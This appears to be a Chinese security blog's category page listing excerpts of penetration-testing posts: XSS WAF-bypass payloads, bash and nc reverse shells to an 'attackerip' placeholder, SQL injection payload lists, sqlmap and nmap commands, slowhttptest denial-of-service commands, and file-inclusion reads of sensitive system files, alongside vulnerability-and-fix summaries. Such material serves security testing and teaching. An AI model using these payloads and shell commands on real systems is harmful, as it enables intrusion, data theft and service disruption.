Web安全漏洞
关注
分享
扫一扫
文章平均质量分 79
企业信息安全
挑战自我
展开
-
XSS现代WAF规则探测及绕过技术
初始测试1、使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;3、尝试以下的payload<script>alert(1);</script><script>prompt(1);</script><转载 2020-09-28 09:17:06 · 728 阅读 · 0 评论 -
反弹shell与生成shell
反弹shell0x01 bash 版本:bash -i >& /dev/tcp/attackerip/1234 0>&1注意这个是由解析 shell 的 bash 完成,所以某些情况下不支持。我用 zsh 不能反弹。这个也是最常用的。0x02 nc 版本:支持 - e 选项nc -e /bin/sh attackerip 1234这个方式最...原创 2019-12-04 19:44:06 · 998 阅读 · 0 评论 -
详细的渗透思路(转Mr-xn)
信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站ba...转载 2019-10-06 20:26:59 · 5623 阅读 · 0 评论 -
nmap常用命令以及脚本
转载自:http://www.4hou.com/technology/10481.html还有freebuf系列的文章都挺好https://www.cnblogs.com/MacoLee/articles/5714165.html4种常用的扫描1.nmap -sP 1.1.1.1/24探测C段存活主机,可以用 |grep up 过滤存活的主机2. nmap -sS 1.1....转载 2019-04-15 00:53:14 · 3833 阅读 · 0 评论 -
sql注入payload
分享一些平时测试用的sql payloads1:BOOL SQLINJECTION\'"%df'%df"and 1=1and 1=2' and '1'='1' and '1'='2" and "1"="1" and "1"="2) and (1=1) and (1=2') and ('1'='1') and ('1'='2%' and 1=1 and '%'...转载 2019-04-12 15:12:50 · 3993 阅读 · 0 评论 -
sqlmap命令3
当给sqlmap这么一个url (http://www.target.com/sqlmap/mysql/get_int.php?id=1) 的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、...转载 2019-04-11 09:59:19 · 1181 阅读 · 0 评论 -
sqlmap命令2
sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询...转载 2019-04-11 09:57:16 · 906 阅读 · 0 评论 -
sqlmap命令
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data...转载 2019-04-11 09:51:22 · 1558 阅读 · 0 评论 -
系统漏洞及修复汇总
仅供参考 DNS域传送漏洞 漏洞描述:网站DNS服务器配置不当,使得攻击者可获取DNS数据库的详细信息,导致所有域名DNS泄露,从而引起进一步的入侵。DNS主备之间的数据同步就会用到dns域传送,但如果配置不当,就会导致任何匿名用户都可以获取DNS服务器某一域的所有记录,将整个企业的基础业务以及网络架构对外暴露从而造成严重的信息泄露,甚至导致企业网络被渗透。漏洞测试:如dns...原创 2018-11-23 16:12:32 · 3023 阅读 · 0 评论 -
WEB应用漏洞及修复汇总
仅供参考 1.SQL注入风险等级:高危漏洞描述:SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验,即没有进行有效地特殊字符过滤,导致网站服务器存在安全风险,这就是SQL Injection,即SQL注入漏洞。漏洞危害:机密数据被窃取;核心业务数据被篡改;网页被篡改;数据库所在服务器被攻击从而变为傀儡主机,导致局域网(内网)...原创 2018-11-23 16:08:48 · 1803 阅读 · 0 评论 -
中间件漏洞及修复汇总
仅供参考 Nginx文件解析漏洞 漏洞等级:高危漏洞描述:nginx文件解析漏洞产生的原因是网站中间键版本过低,可将任意文件当作php可执行文件来执行,可导致攻击者执行恶意代码来控制服务器。漏洞危害:机密数据被窃取;核心业务数据被篡改;网页被篡改;数据库所在服务器被攻击变为傀儡主机,导致局域网(内网)被入侵。修复方案:升级中间件版本...原创 2018-11-23 15:59:06 · 1257 阅读 · 0 评论 -
slowhttptest 慢速攻击
apt-get install slowhttptest slowhttptest -hslowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://www.xxx.com/index.html -x 24 -p 3slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 819...原创 2018-10-12 16:35:31 · 1228 阅读 · 0 评论 -
慢DOS-slowhttp介绍与测试
slowhttp:slowhttptest包括slowloris, Slow HTTP POST, Slow Read attack等。原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源,达到攻击目的。slowhttp攻击不像ddos那么直接通过大量连接(请求)搞崩溃服务器,它折磨死服务器,让服务器感觉各种不自在,感觉像生病了一样,然后慢慢死去(业务无法正常运行)。sl...转载 2018-10-04 17:53:40 · 254 阅读 · 0 评论 -
百个XSS-payload注入汇总
(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javasc...原创 2018-10-04 17:55:30 · 3722 阅读 · 1 评论 -
MySQL基于布尔型盲注常用语句
什么是盲注?基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。常用语句汇总查询所有数据库1.判断表存不存在 1 and exists(select ...转载 2018-10-04 17:55:51 · 2475 阅读 · 0 评论 -
文件包含之铭感目录
PHP文件包含利用(1). 读取敏感文件访问: http://www.xxser.com/index.php?page=/etc/password如果目标主机文件存在,并切有相应的权限,就可以读出文件的内容。反之,会得到一个类似与: open_basedirrestriction in effect的警告常见敏感信息如下:win:C:\boot.ini ...原创 2018-08-03 10:50:16 · 239 阅读 · 0 评论